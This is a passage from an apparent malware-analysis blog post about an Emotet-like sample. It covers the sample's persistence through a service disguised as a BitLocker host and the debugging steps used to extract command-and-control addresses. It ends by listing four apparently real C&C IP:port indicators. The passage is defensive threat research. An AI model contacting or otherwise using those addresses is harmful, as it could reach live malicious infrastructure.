Stage 3 - Final Payload</h2>
<br />
Running the executable I figured out two possible scenarios. The executable copies itself to %LOCALAPPDATA%\Microsoft\Windows or %SYSTEMROOT%\SYSWOW64.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ-lYJo_12UKZzR1UAVzIDVAO9F-aqJPF4Vi_R8G-EGDLGt7n1XAWRcBxihIhWHZCtvD87dE6DfK0P5dYi6xJwL_B85SE9AkuH4jqz8UH2IhENA5FsSPhuJK1zkRpr_9pqCEja5N3o7OPi/s1600/case1exe.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="625" data-original-width="738" height="542" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ-lYJo_12UKZzR1UAVzIDVAO9F-aqJPF4Vi_R8G-EGDLGt7n1XAWRcBxihIhWHZCtvD87dE6DfK0P5dYi6xJwL_B85SE9AkuH4jqz8UH2IhENA5FsSPhuJK1zkRpr_9pqCEja5N3o7OPi/s640/case1exe.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">running without admin rights</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
In the first case there seems to be no persistence as the executable won't start again on reboot.<br />
In case 2 the executable creates a service with the executable name as name and restarts on reboot.<br />
I
noticed that even though my account is an administrator I have to
explicitly start the program as administrator to observe case 2.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf2Zw48jMYIN_b-LMgQS4MxR_qzZ0eSIA2EaUCuOqZw3wq8XQrSYuWwdIwjGk5n9QsY87TOypu2iUIVCevzmWm4HxoLhG5OaBF73pjyNhv27I31WrCHONfYFo_l7Fs9_wFDk5dIPicGt0s/s1600/case2exe.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="642" data-original-width="744" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf2Zw48jMYIN_b-LMgQS4MxR_qzZ0eSIA2EaUCuOqZw3wq8XQrSYuWwdIwjGk5n9QsY87TOypu2iUIVCevzmWm4HxoLhG5OaBF73pjyNhv27I31WrCHONfYFo_l7Fs9_wFDk5dIPicGt0s/s640/case2exe.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">running with administrator rights</td></tr>
</tbody></table>
The service is disguised as Bitlocker Drive Encryption Service Hoster by telling the user that disabling the service would prevent Bitlocker usage.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisEcg5dC1EUyNXnEN5G0jNZPAmlLsNhGnshCzMnbgxJLCP0iaLTFVrQNEAzoxaHwx28MM2_wvndvErmVPzEm_RfeuChwaS9qhpB0rdR9vgjSWSoFYKIXdqDCO8eFMn0Hk7_b4jtaQLB2gd/s1600/case2service.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="319" data-original-width="733" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisEcg5dC1EUyNXnEN5G0jNZPAmlLsNhGnshCzMnbgxJLCP0iaLTFVrQNEAzoxaHwx28MM2_wvndvErmVPzEm_RfeuChwaS9qhpB0rdR9vgjSWSoFYKIXdqDCO8eFMn0Hk7_b4jtaQLB2gd/s1600/case2service.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">service used for persistence</td></tr>
</tbody></table>
<br />
<br />
<h3>
Figuring out the malware family</h3>
Monitoring the network connections I could see a request to an IP every 30 to 60 seconds. These callback to IP addresses combined with the fact that the executable name seems to rely on existing software on the computer immediately reminded me of the Infostealer/Banking Trojan Emotet.<br />
<br />
Having a look at older analyses from Emotet v4 (<a href="https://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1">https://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1</a>) earlier this year, the samples show a similar pattern, even though the persistence mechanism is different.<br />
<br />
In short: The old version created a new process and inserted it's code into it. The second thread had a hidden window with a WindowProc handler that determined which function should be run. These were generated using WM_TIMER messages. Running the executable and watching in Process Explorer, I noticed a similar behavior. The process started a new process and the old process stopped.<br />
<br />
As the behavior of the new executable is quite similar I expected to find another WindowProc function somewhere. I tried my old method of extracting the C&C IP addresses of Emotet by running the malware and dumping the final stage. Then I could simply use IDA Pro or Python itself to extract the addresses. Emotet saves them in plain hex and extracts them using %u %u %u %u format strings.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
I tried to use the same approach and noticed that byte patterns for callback IPs I monitored weren't in the executable. So I decided to attach a debugger.<br />
<br />
<h3>
Extracting the callback IPs </h3>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpLYGOFcyAS_95YwcN26V6McrMNMGjXjCSum5q_nrM1Ix8O1BdRoHl41jwqlLICTaXsfEA9736fQRjoTfa9dqY8203ePALTTdmpPD5xRjD4stz3h6R7CKaVAQhdoq7d5XI-2pM2EomvvpC/s1600/debug1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="1408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpLYGOFcyAS_95YwcN26V6McrMNMGjXjCSum5q_nrM1Ix8O1BdRoHl41jwqlLICTaXsfEA9736fQRjoTfa9dqY8203ePALTTdmpPD5xRjD4stz3h6R7CKaVAQhdoq7d5XI-2pM2EomvvpC/s1600/debug1.JPG" /></a></div>
<br />
<br />
<br />
<br />
Upon attaching a debugger I noticed new threads being created every 30 seconds (in sync with new callbacks).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJGE-GCnnflYFv7X83vljb5VCddBSzMVKM9iJlYJoRr35IMoIcfkG2MZoJWd-X2J2-hMbF3lqzag0deJikZucWV_-m09UPq5C-jdCn-SCSMxP52uj0aS5pc2r3MVQxlzSI2VAy4i3PWUX/s1600/callback.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="245" data-original-width="982" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJGE-GCnnflYFv7X83vljb5VCddBSzMVKM9iJlYJoRr35IMoIcfkG2MZoJWd-X2J2-hMbF3lqzag0deJikZucWV_-m09UPq5C-jdCn-SCSMxP52uj0aS5pc2r3MVQxlzSI2VAy4i3PWUX/s1600/callback.JPG" /></a></div>
<br />
<br />
Having a look at the callbacks one can see that WinHttpRequests are used. These rely on creating new threats for requests.<br />
<br />
The next step is to set breakpoints on kernel32.CreateThread and wait till the breakpoint is hit. On break just have a look at the stack. A callback address, this looks promising.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJPKtDC1yyeWc4jtp10fnvKKoALfvk-r6oA0_lQzq4tJy2itBiqW-vqDhtu7L-69eVzAfP2G3t1B6z82VGRMxfYVB_QxcDV7gzBmOqE1K6MiIQzmImRTaHy_zLHukNrqcPVhccCsVi0vIr/s1600/debug2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="214" data-original-width="561" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJPKtDC1yyeWc4jtp10fnvKKoALfvk-r6oA0_lQzq4tJy2itBiqW-vqDhtu7L-69eVzAfP2G3t1B6z82VGRMxfYVB_QxcDV7gzBmOqE1K6MiIQzmImRTaHy_zLHukNrqcPVhccCsVi0vIr/s640/debug2.JPG" width="640" /></a></div>
<br />
<br />
The call stack in x64 debug shows only return addresses in dlls. So I scroll further down on the stack. The first address I find outside the dlls, is pointing right after a call to HttpSendRequestW.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQM_vB2Q6_v2xZpa_4K7fyAnvULif6_2ROJYkpIpGHDR1ob0dXT2P16ZiQ9W15asfkvmCgktyD4AMINGQMIlKgvo9i-rfIt0CVmi8aq7aEzCTaMZI-BDsdvwMuP6UEKzjN8vMma9G7Y8a2/s1600/debug3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="711" data-original-width="1330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQM_vB2Q6_v2xZpa_4K7fyAnvULif6_2ROJYkpIpGHDR1ob0dXT2P16ZiQ9W15asfkvmCgktyD4AMINGQMIlKgvo9i-rfIt0CVmi8aq7aEzCTaMZI-BDsdvwMuP6UEKzjN8vMma9G7Y8a2/s1600/debug3.JPG" /></a></div>
<br />
<br />
The next and final step is to find the IP addresses structure in memory and extract all IPs.<br />
Therefore just run until the next return is hit and step out of the function. Right above I noticed a printf call which is used to convert the hex to decimal values.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEo7I-_rIm1WnkFV1pP2TCPn1JucAkkpGwD5vCE4t_0XAB24ymJ8u0doasVssj46sUxC4J8t7nqV1ADyFVDppd8PP3XTp2eRHqjeHEF-7lT4-ed-DnyEaMkfM4Cx-88yw0mm18iBWW3Cad/s1600/debug5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="983" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEo7I-_rIm1WnkFV1pP2TCPn1JucAkkpGwD5vCE4t_0XAB24ymJ8u0doasVssj46sUxC4J8t7nqV1ADyFVDppd8PP3XTp2eRHqjeHEF-7lT4-ed-DnyEaMkfM4Cx-88yw0mm18iBWW3Cad/s1600/debug5.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Before the call to printf notice the 4 movzx eax, push eax instructions. Following the base address 325B298 leads to the array of callback IPs.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE2iZtZ-Z6mPhognxyQ3i7aEX6H5zI2s-4jU7eGaY2IJoKB5W4aZ6knzba3EBaCCPMFYVplLBgSGDQ9nzVzJKCFUgSqdzCDuFdNPoUiiVTXiYlrrpADbtO5DUYt1bD9ihg13JdsIWEki5D/s1600/debug6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="94" data-original-width="847" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE2iZtZ-Z6mPhognxyQ3i7aEX6H5zI2s-4jU7eGaY2IJoKB5W4aZ6knzba3EBaCCPMFYVplLBgSGDQ9nzVzJKCFUgSqdzCDuFdNPoUiiVTXiYlrrpADbtO5DUYt1bD9ihg13JdsIWEki5D/s1600/debug6.JPG" /></a></div>
<br />
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:HyphenationZone>21</w:HyphenationZone>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>DE</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]-->Each callback consists of 4 bytes for the IP and 4 bytes for the port. Converting them back leads to the following IP addresses.<br />
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Normale Tabelle";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
</style>
<![endif]-->
<br />
<div class="MsoNormal">
<i>173.212.227.54:443</i></div>
<i>
</i><br />
<div class="MsoNormal">
<i>104.236.252.178:8080</i></div>
<i>
</i><br />
<div class="MsoNormal">
<i>162.243.159.58:443</i></div>
<i>
</i><br />
<div class="MsoNormal">
<i>45.33.55.157:8080</i></div>
<i>
</i><br />
<div class="MsoNormal">
